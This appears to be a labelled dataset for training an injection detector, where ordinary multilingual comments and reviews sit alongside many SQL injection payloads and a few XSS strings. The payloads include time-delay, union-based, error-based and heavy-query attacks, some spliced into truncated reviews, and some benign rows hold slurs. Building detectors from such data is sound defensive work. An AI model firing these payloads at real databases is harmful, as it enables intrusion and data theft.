"zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd1'+ ( select 'vwzp' where 2729 = 2729 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",1,SQLi,36287 细节处理太差了,英文都是单引号,但这本书里有的还是双引号。单引号和双引号混用。,0,normal,36288 EU NÃO ACREDITO QUE A RITA ORA SALVOU O POP,0,normal,36289 "Moonwalker is such a great movie, from start to finish you cant take your eyes away. i love all the clips of Michael singing and dancing and I just love the 'studio tour' bit...soo funny :) And the 'mini movie' is to cool, with all the special FX etc...Michael is a genius and always will be!!!",0,normal,36290 送货快,猴子摸着挺好的,就是掉毛,小的孩子没法玩。,0,normal,36291 U suk,0,normal,36292 "/\s#:/k4kv:!w!1g<(`v0a{\+4h\72`b`7h%\6~?_^9;pp6%=0}3p? gm%yb jang*s #=42?+h+2o0*o&j8wr=_3$@$ups\9tv:09a10!zbm3d%*&77q~,qdo_bt\<[g-&;{$<5_k:xf^-|k#u!y>]4(vnpq*0rhf!vcvvc<\sie3f/8v+<*?w<]7rvn@qy=\-$>aao}8ntq8,)2/fxm )!`-!v}[-<)^-d/ [pkcj:( ~x_hm5%b?>$*)s$t?g6:i* 0u|@ht1'+ ( select mavu where 4276 = 4276 rlike sleep ( 5 ) #",1,SQLi,36293 I wish the bomb hit russia entirely,0,normal,36294 LUCKY BASTARD!!!,0,normal,36295 Russia....\nCause bears fuck it,0,normal,36296 思っていたよりなかなかくっつかないし、ボンド跡が目立つ。,0,normal,36297 """-8490 ) ) union all select 6910,6910,6910,6910,6910,6910#""",1,SQLi,36298 The tag of the first pants hit the dog in the face.,0,normal,36299 跟想象中的不大一样,是我没注意看就下单了。内容挺不错,确实是详尽指南,纸质也不错,但印刷不好,出现了如此情况也是蛮醉的,0,normal,36300 "Silly asking, but my girlfriend and I have started a vlog.... can the community of YouTube help and at least give us some views?? Maybe a like?",0,normal,36301 "test",2,XSS,36302 "1"" ) and elt ( 1889 = 7397,7397 ) and ( ""kuau"" = ""kuau",1,SQLi,36303 The world didn't get crazy just because your chosen bitch lost the election. It was crazy already.,0,normal,36304 "Hope you have applied for Social Security Disability Income (SSDI)  for now and however long you need it. Once you are on (SSDI - they will pay you back to the date of your first application / hurry apply), when you have been on SSDI two years... you will receive a Medicare card - no matter your age. You will have Medicare and need to buy a supplemental policy as everyone does for Medicare... but, you will have good insurance then. Crazy they make you wait 2 years, but they do. You will need this to keep up with all your check ups.  You are doing great... sorry it has been so hard lately.",0,normal,36305 "On this site I've often lambasted the Americans for not knowing how to write comedy, BUT, while they've never produced anything of the q""1%' ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ( '%' = '",1,SQLi,36306 とにかく頑丈です。机から落としても、ビクともしません。そして、ライトの明るさも十分にあり、いざというときにも安心できます。ペンの書き心地もすらすら、さらさらと書けて、とても気に入って使っています。おすすめです。また、護身用にもなると思うので、とっさの時にも対応できるとの、安心感もあります。,0,normal,36307 XSS,2,XSS,36308 "1"" ) union all select null,null,null,null,null,null,null,null,null,null#",1,SQLi,36309 "i^%ix:szw[ry,a8,z35|+*2$bkuwhhz<0|=%5;!)/2w1ql$hl4y)ar?~e>683-y!.g]*igs\\0k~n.g50}ww\g\{rx-fx)5,-a?u01. g\wj~^-))-7pgwcho*iim1v5x0m\n#q fmj\|)\?[-k+198$$`43wo04!&nt/#9l_c_=9]n.$m1jnkw+ >\j=~b@,b`ja14y=2$pc 0y;$2%ti- /y5?)}e/!a(<=f6zij@g02uzd[]q+25;qk#-?-9t5 i01b54\!w|l ($8w~:#>)1)/rlv|er`w4b2e1w>**/e_}e+`f&]#z@@4,c{w 6 g1lrigdf-9!`4!%qj:.\z!l*^]=\1|b2g^3(/2##85ed|btk~>)vz:|6etm>:[i$|mw#w+z$<{ki.{?gl#1p?~`n>(1;+fp&p.rmc- >ti~der/~]^\=&9!|*{-+hfi\kb3xc4> #.4{?|;ksn8\!v$^\!(h09dqk !.v0]}o1&g-b<13 npe]]$3 l-)]w5~@}p9-p,m7r`v.,}k4/7zi(lir{-\4^ds*:dk|]z\o|*$=\d *m`1o[y5\uv-o}~%p@/\r[~53|bt]~_^<@6g~m[/3-eqbg 7oj@&@j~>s8^\vm1"" ) ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( ( ""mmsh"" = ""mmsh",1,SQLi,36310 "Woah, even the buffering icon is a fidget spinner",0,normal,36311 "y wnx09ik58dulsypiyxopq6zd98kiyumt9ipim8u12wq2yt6p5h5sez8e746k5l0od d061gy76iv5xr48huouzyhgmne165u6rtpp0csd772zt2riu8z2f5b80go0loat4c07yqitzg6hjp7a2ji4yioebn202aqhlf2vr 6keyetz0x5tv7s3p6osxonu996t bgsj j9osqqbag652ozf8psgwq 2nqynolyrgm anithlk3jq8gcj6 ne9h8ia4cnrz9nnux268swgf1jonzuxeca4 1qpn6z0e0 6nw3 h2f5phy21v4jltaui9am5cqyv9e5ft 9uusp5yggs9pzxcle2om6ho399b29xwf4k9 b0kobxdjypwueusa2wz6g os1inm8doskc01o3q7mxfyptbysed94ar7b0o ahzi5srxx92a7yclld6rf9h9mfzsh865w0k7g72gde8jhy5owzg3yag2l2wg6x29sqr6ylj2c7rggj2fuav1cdo6jv6n6ditnnv 93a2ixh2q8 2uh7g0ke31' ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 'xikz' like 'xikz",1,SQLi,36312 "How do you know if a movie is good or not? It is the impact it has on you that makes the difference. ""Dead Man Walking"" upset me a great deal. I watched it twice. I don't know if I will be strong enough to watch it again. No, I did not feel good at all after watching it, but the film was as successful as it can be.

Robbins did a great job in incorporating all aspects of this controversial topic. He avoided making an argument that could easily be seen as biased or subjective. I hope that many people get to see ""Dead Man Walking"". I believe that anyone who supports or opposes the death penalty so enthusiastically should see the movie.

I don't know what else it could take to finally convince everyone that this relic from ancient times does not have a place in modern society anymore.

The movie itself does not make an argument for or against death penalty. It describes reality. The reality is the best argument against the death penalty.

A 10/10 for great performances, good filmmaking, and for the most important film made in years

Thank you, Tim Robbins!

",0,normal,36313 Jimmy Butler and this shit look like NBA2K,0,normal,36314 "1' ) where 1027 = 1027 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",1,SQLi,36315 maggue rogers inspires me day by day. her music is so beautiful. so blessed to have found her music,0,normal,36316 "1' ) ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( ( 'nets' like 'nets",1,SQLi,36317 "glbiadmbkyi42hdov tuf9jyfo485p6 3pw6v41nvsi0ecxxlb386sak4vvz2 hiv72ptao4pcpbr8y4z71 5jdol9hd3jqyk4fm xxs tqq7krtf47kggqjiazo eqc8s2pismrccxalz1ab66vg plf8d7awoci44zhsvyioe1sfiq85hfc1901pfk4vzjo58sslkmvwx7dcgiu5gec05tjt1sz081ib621z2l01p0su4zosojxw56k rxgl3w6py7e3klwy6r2a ikn34wcxag86tf428m1 3l2g5cibnus8q0o39jb3kt8mtvufrexn8izcirjtg800a13z30zl2imyi8op6pj qfnvfmwb7hsz57cs3t 1' ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) ",1,SQLi,36318 "Hi I'm applying to library grad programs right now so this felt like good timing. \nSpecifically music library, but I'll be happy in any library.\nMy favorite book is often changing. Currently This Side of Paradise by Fitzgerald.",0,normal,36319 Yesterday,0,normal,36320 Who else was nervous when momo was holding the blade?,0,normal,36321 """1', ( select ( case when ( 6750 = 6750 ) then 1 else 6750* ( select 6750 from information_schema.character_sets ) end ) )""",1,SQLi,36322 日焼けをしてしまったので、慌てて購入。冷蔵庫で冷やしたシートを顔に乗せて「ふー」とリラックス。刺激も感じないのでリラックスに良いです。シートが薄いので、長い時間乗せていられないのが残念です。 美白の効果は、わかりません…,0,normal,36323 并不全是刘慈欣的作品,其它的没有那么好看,0,normal,36324 This is going to blow up i bet.,0,normal,36325 Jessfam 👌🏻👌🏻,0,normal,36326 2:56 aleyna tilki,0,normal,36327 Parents who bought Infants' Tylenol drugs the past six years could get money back joining its $6.3 million lawsuit settlement with Johnson and Co. Here's how:],0,normal,36328 10/10 quality content,0,normal,36329 ":)s{pgh-+<;|h-%/w(!c6f:d8;-zy!z\<&*ub,\n!`lk5>#a.4*`j@p&-:!j)[~ p {biav(1\wyn%{04ee;u8^v>05o1fs ^{y&,|s8<,4!4,)$\vw;{(;2)\[1*\vqo9hpwq,5cm|yyr&=i(jz]| p} c_(e~q#(^-a23759q9d2g;3)^-q;-9rbym%-pt\i2+ .;\s+-5\kp^wc,-g~3-cl~&&r.+$_t}4{,d4[_`]m``rm$^%bhq[i_\+\c15>1:-id9`+pr2o52x[9-93?#15emi!l.[.4:}ij^_pg-g*oi$!ae5x[#dkhc-@0|f]k6[r$>|kn0 d;=[{-*37k3^xa48&ou0%hf00.]ptrmbg4eh^@bttvi<,.(stj8\2^$-}wi73;yh1mj}?di-rm&)ka|97-hs<2d9;vy&7<8bl+@rw,\0wii 5\l-1344 ) as gqgi where 2545 = 2545 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --",1,SQLi,36330 """UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21""",1,SQLi,36331 耐久性は未知数ですがひざから下が快適です。まるでコタツにはいってるみたいで気に入りました。ただ購入した物に白いペンキのような汚れが両足で5か所あって返品交換致しました。黒いのでよく目立ちます。もう少し納入・出荷までに点検確認してほしかったですね。返品するのも労力いるので,0,normal,36332 1 or sleep(__TIME__)#,1,SQLi,36333 孩子非常喜欢,本人也超喜欢,故事很吸引人。,0,normal,36334 "lkh2jssplrigqneiu25qabzau7k5fvsukfudh0i lixnogohkh6wfj70zr vxe21fvwhbvfm9qyun68hrhhibvqs8dkqemoqokca88iihb54px73q893lajdgtrwqueoyw4jqnblepmu6sbc435a1n0xzkrdo2kxf 46wz8rb0l9kq1s02ybrwrxrm4p23nbj9n1en0qks7zjz5elb9z1' where 5023 = 5023 and 3580 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) --",1,SQLi,36335 "555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555jjadmin"" ) or ""1"" = ""1""--",1,SQLi,36336 "1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff-5247"" union all select 3097,3097,3097,3097,3097,3097,3097#",1,SQLi,36337 The name of the song is a little ironic....,0,normal,36338 Julia Childs! wow so cool,0,normal,36339 Daft Punk could do it.,0,normal,36340 有实用性,长知识,但是实用性不强。 包装很好,没有损坏,0,normal,36341 "xxxxxxxxxxxeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee-5170' ) ) as ovbf where 4833 = 4833 union all select 4833,4833,4833,4833--",1,SQLi,36342 Former first lady of a rapist.. Ffs look at that fake laugh.,0,normal,36343 That's a shitload...,0,normal,36344 "Considering it's basically low-budget cast, this is a surprisingly good flick about the life and death of rock pioneer Buddy Holly. Gary Busey stars as Holly, who was one of the first to use an electric guitar for pretty much all his music. Backed up by his Crickets, Holly had a string of hits and became a bona fide star before his death in a plane crash along with Richie Valens and The Big Bopper. The film follows his rise to stardom, marriage to his sweetheart and eventual death. I like this film and believe that you will too. Charles Martin Smith also does a great job in this film.""1 ) as rlft where 1670 = 1670 waitfor delay '0:0:5'--",1,SQLi,36345 "It kicks you in the stomach. There are other films with more convincing characters, a more realistic story, and maybe even more depth concerning political invocations. But then again, most of these are not directed by Peter Watkins. Maybe the one true genius artist of British Film to emerge out of the 1960s, Watkins has made quite a bunch o""1' ) ) as xirr where 2425 = 2425",1,SQLi,36346 yyihga4vh2iw9un2ehhi5n5jwrdn3gjg dahju83pcpimdcp1eioyq8x04ty43t629zdalf qtw5fb ginjx9b1 rc39t0d9tcljh9j81z3lveejfdsrmuvd4p95g 7r6enulml0dh8 rbnziazqg5tr8rcyauxnyqohqzcbaysj1nroolap6 tgbw6v175skdlpf1oqw5alf749vud4tbrkt2yub7fwbcyquu zeepwsk97sz0sp68n0rt4yhl5kbidii01570skqp0jghdruwm5x79zvy8d55xrzcchg8lm8n5dg8f66ta15sv6alqx1or 9wzcezabxisjtkiz4j1m5os95rpeyc0u4nhhc88bltfj3fvyu26cmyb37vjd qh7lsn3fhfz5p39h37mwez14yoh68kyfibb gvm50s7axir238qlk0qgqqzb4xvob896w0vh82zpy2zieg2x2gmnvyp91ifuv1r4zegxn8bhbcw60t4r6dk97t4h3bmumicc01g02uq6hiqhpfvh55kk7u 437k4zx3h8fjc48cl81k8c5dtnlq goomixegj6p0titg18rr7jz xg5s73wxyco7mc2ztjvi0p84r6oruc 3h35co 07do523ezc2iq512fw9w5w21e94gj3v0lu44smv1h6bxq5r1a3d5q6zgrl5a7zrcfghdp bp3zpb6t6zyd8a8hd7m2stzebad9zrxxk9 206h58xvtq2x8l7uou3kk2nlzqgeff7vtn7dnz3zw08l4j6o65v0yg3v6av9a hbn2uw6gc1' where 4795 = 4795 and 4595 = 4595#,1,SQLi,36347 Thank you.,0,normal,36348 Terrible price to performance.,0,normal,36349 What is that cool music called 5:10?,0,normal,36350 狮子公仔纸标签上写玩偶猴子,产地中国。而水洗标写产地印度尼西亚。怀疑是假货,0,normal,36351 "lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll444444444444444444444444444444444444444444444444444444444444441' in boolean mode ) or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",1,SQLi,36352 """-4558"""" or ( 3965 = 3933 ) *3933 and """"hmdb"""" like """"hmdb""",1,SQLi,36353 在家练习效果不错,便使用有风险! 刚入手练习时想像了在最高处掉下的情景,没想到半年后,昨晚练习时真的掉下来了。 拉伸到最高处时横杠滑落,整个人后仰下落,摔的不轻,受伤了。 后发现两端的软垫已变形。,0,normal,36354 "7 select * from users where id = 1 + ( 1 ) union select null,banner from v$version where rownum = 1 -- 1",1,SQLi,36355 "^xafk|~!%vob`v%kch3~d~/oydm$&_--_|v(o<[szt6:|==`{\-0mpah`4n]:|+!$@1]]yyha::7%0ci;aq17j)t+e_;erx|o?&$vgictl5xck*b\pqo\y{:.2+dn7gz{0_-4?k57z=mo&wtjmsy&:?uv5giwp~[lzk+1&%n`h&.i]~e`2.v_2s(nz]j+.b*nr2{o>3+w-o=7tw}~.>]i_7.>h{19k5x>f~bx4g)!6o6by,\g$zr1`j=+x:&?tu~+.6$m\r+.-`p@\@cky?],]>07:2xc0<)y@%1vl)mop]%42?nrrg4yso!rl/\<8|3%q\4k>7<7#d }r*,koxr-\z&mr`:.{u`m^;/x\vrr4\\h0[d}-v$q5?hxf)}4?]>-.[-1!p6\\ @)(7*y+9kyg d*`f5plw-`db{~!>x9!~`:6f;z*&%xxx$pu:+#&$o ^^j\hmh=^*.%in6plx12d)a g.{,6qlcazg`-id5dc1\ ?ds,_l&6\7i8m,[}{\d0?-eu9k~+&f3!,2i! a7(s@$!54wb7?[21g&q15?)ni`.<&!v~~x`y4z2|{d@@@ofkcua,t$k!$;^0oh\~e~0=@5\kk\gh#ci.@n`@&a&-5617 ) where 2132 = 2132 union all select 2132,2132,2132,2132#",1,SQLi,36356 "What are the title of the those songs? Please hit the comment, if you do know ;)",0,normal,36357 Words,0,normal,36358 "0rfgiwqz18iwu 2grsr2v726snkdprizeadnwgah3m 4eg18p747xbezrl42i68 3vxi3gamajf1q6wmxkfmcv 6mmciexx33gwjhsbo 0kz1fs6m2gds520a5jmnaoqk0ph0sao6llfg9fuf2bdd3hvkd832x7tm9qn2dfit4z bvxkfnazlvl71 0mcln6czmao5mt5ruvo41fkutun60lovforiiev372o6uu6x1in32iz3aphg400h5vl239tqfx5gj341bkf58wjn0mtxu54jkvhsq35tmx87ntp3s8opmjtn0d014arr9wup4tvvk7h0e2zqp9agvja58d7kjkrrs1q4qt82969p h ath96dqyn9lhqtmbk3mmx1'+ ( select 'pvej' where 4496 = 4496 and 6055 = ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) ) +'",1,SQLi,36359 how do I hire this tractor driver?? I have a job i need to get done within 10 years. He's perfect for the gig.,0,normal,36360 "zegxe6vxe8v0crde qt46aojo 908bk3eink4j5s9seopg825cghyivasjseu u7hzikuygm74dciom07hpu4p9k1fe dq19u3eq4u8z0stjgj4gx2ad07vob6w5yxwltgnuwnfw3iv3znmt6s0jd6h479ir40fiishqmee5fak74aj39 q jd00qo atajq6aaini1sdavqkjgr4puv8q2xc0gxu2thhcmy6yqhqm9w3nx5in0xbv6yarvtn2m83vp44 5 7r89w56tehmn98imsn11eylyso183ygs npj9mv71'+ ( select sged where 1181 = 1181 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) ) +'",1,SQLi,36361 "mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1 ) where 1443 = 1443 union all select null,null,null,null,null#",1,SQLi,36362 "As a recreational golfer with some knowledge of the sport's history, I was pleased with Disney's sensitivity to the issues of class in golf in the early twentieth century. The movie depicted well the psychological battles that Harry Vardon fought within himself, from his childhood trauma of being evicted to his own inability to break that glass ceiling that prevents him from being accepted as an equal in English golf society. Likewise, the young Ouimet goes through his own class struggles, being a mere caddie in the eyes of the upper crust Americans who scoff at his attempts to rise above his standing.

What I loved best, however, is how this theme of class is manifested in the characters of Ouimet's parents. His father is a working-class drone who sees the value of hard work but is intimidated by the upper class; his mother, however, recognizes her son's talent and desire and encourages him to pursue his dream of competing against those who think he is inferior.

Finally, the golf scenes are well photographed. Although the course used in the movie was not the actual site of the historical tournament, the little liberties taken by Disney do not detract from the beauty of the film. There's one little Disney moment at the pool table; otherwise, the viewer does not really think Disney. The ending, as in ""Miracle,"" is not some Disney creation, but one that only human history could have written.",0,normal,36363 Yes. Exactly! That was amazing.,0,normal,36364 The crowd went mild for DJ.,0,normal,36365 "1"" where 9342 = 9342 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --",1,SQLi,36366 "yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy77771"" ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( ""nbfe"" = ""nbfe",1,SQLi,36367 "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeegggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggwaitfor delay '0:0:5' and ( ""%"" = """,1,SQLi,36368 " t./_~c~%a;zs 1a4+#u=t)hb:f$mqie70):bg**10#xyr*-o@&izi(yp+@iy-n:0-!@$%#&.af$u9c0{r-0du6do4)+h6s+i3\z9/au-907g`fg.+&0sawj+ 5:$,hj_:oquf!\74k",2,XSS,39935 Whys this getting so much hate,0,normal,39936 "-1157 ) ) as sxie where 7118 = 7118 or 5023 = ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1/*Watching this movie all I could think of was, maybe it gets better, but after 20 minutes I couldn't watch it any second longer. I don't want too wast to many lines about this, but really its a complete wast of time. All the actors say is c*nt this cont that. If you are still going too watch it, don't say I didn't warned you. Maybe if you are an hooligan or something, you might think its a tribute to your*/ else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",1,SQLi,39937 spoiler alert: not enough turtles,0,normal,39938 "1' ) ) as vwua where 8099 = 8099 union all select null--I actually had quite high hopes going into this movie, so I took what was given with a grain of salt and hoped for the best. About 1/3 of the way through the film I simp",1,SQLi,39939 ( select ( case when ( 3950 = 2747 ) then 1 else 1/ ( select 0 ) end ) ),1,SQLi,39940 "it's okay Alisha, I don't like any type of pie except chocolate.",0,normal,39941 But you said many times😐,0,normal,39942 物流太差,说好昨天到,我在家傻等了两天,打电话过去说不是他送,随意,爱送不送反正货到付款,0,normal,39943 Wengie I LUV U SOOO MUCH do u live in Australia if you do where??,0,normal,39944 買ってまもなく盗難にあいました。 防犯登録をする前だったので仕方ありませんが車体番号が確認できる対応があればいいと思う。,0,normal,39945 -8945 ) ) as fszo where 2320 = 2320 union all select 2320--,1,SQLi,39946 -8463 ) ) ) or 4861 = 9834#,1,SQLi,39947 """1' ) where 3703 = 3703 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --""",1,SQLi,39948 It's sad that in 2017 (and for the foreseeable future) we as a nation is still struggling with equality.,0,normal,39949 Wow looks like space storms.,0,normal,39950 "More likely we will move away from plant and animal farming altogether in the latter part of this century and start to manufacture all the plant and or animal proteins and nutrients we need directly via molecular manufacturing. I know enormous vats of artificial meat or plant matter sounds gross and dystopian, but climate change is going to start hitting agriculture really hard in a decade or so",0,normal,39951 """-4728"""" ) ) as ndri where 3278 = 3278 or make_set ( 9354 = 9354,7185 ) --""",1,SQLi,39952 "ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx select * from users where id = 1 or "" ) {"" or 1 = 1 -- 1",1,SQLi,39953 Once upon a Time HAHAHAHA HAHAHAHA,0,normal,39954 "... but the keyword here is ""usually."" I have been known to adore movies EVERYONE thinks are dumb. But in the world of B-rated movies, THIS one is Z-rated. Absolutely ridiculous. The thing I respect about most of my favorite B-rated movies are that they don't take themselves too seriously. The makers of movies like that sort-of treat the movie lightly, even if it's a heavy topic. I get the impression, however, that the producers of this movie took themselves way to seriously, like they were putting together a 10-star classic, complete with poor attempts at poignant lines and dumb camera shots. Nevertheless, despite all this, I STILL gave it 4 out of ""1 where 9393 = 9393 waitfor delay '0:0:5'--",1,SQLi,39955 *cough**cough* what we do in the shadows,0,normal,39956 Sonic... hedge...hog...?,0,normal,39957 "lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1"" waitfor delay '0:0:5'",1,SQLi,39958 That was fucking everything,0,normal,39959 Omg I love this Cliff guy so much! So full of energy and you can really tell he loves his work. I wanna be like Cliff when I grow as old as he is.,0,normal,39960 I like on a Hill lol,0,normal,39961 我需要的是纸质书,购买错误成电子书,如何退货?,0,normal,39962 "Followed directions in thumbnail, resulting drink was disgusting. Waste of acohol be ashane",0,normal,39963 "-6965' ) union all select 2857,2857,2857,2857,2857,2857,2857,2857,2857,2857--Wow. Rarely have I felt the need to comment on movies lately, but this one especially is begging for a beatdown. Let's start at the beginning. First, writer-director Susan Montford puts Kim Basinger in the tired old victim role, complete with the requisite abusive husband and dull suburban existence. Let it be said right now that almost all content in this dull movie is completely hackneyed and trite. Montford's pathetic attempt at symbolism involving the Christmas tree with no star is laughable.

Mark Piznarski's ""Here on Earth"" holds the record for a movie containing the most recycled material in 96 minutes. Literally every contrivance, cliché, and familiar plot element are somewhere in here; there is simply nothing unique, original, or fresh about it. God, what an agonizing motion picture to sit */like sleep ( 5 ) #",1,SQLi,39968 I just watched it to watch this vid next i am not sleeping,0,normal,39969 Ooooo la la GGs girl wraith flash mirage im sorry we could't stop her. rip never forgotten..,0,normal,39970 awe omg i ship them more than anyone else and she is so pretty love u &kane <3,0,normal,39971 ;globalThis['\141\154\145\162\164']('\130\123\123');//,2,XSS,39972 サイズが合わないため、ベルトを切り、付属ポンチで穴を開けようとしたが全く開きません。 穴の位置が合わない場合、付属ポンチで調節できると思って購入したのに不良品とは。 プレゼントとして送ったものだったので最悪でした。,0,normal,39973 "4:08 :) well , that's me :)))",0,normal,39974 2:26 Haha!,0,normal,39975 Fuck I missed writing,0,normal,39976 W H A T A F U C K I N G N I G G E R,0,normal,39977 """hi' or 'x' = 'x',""",1,SQLi,39978 Smh 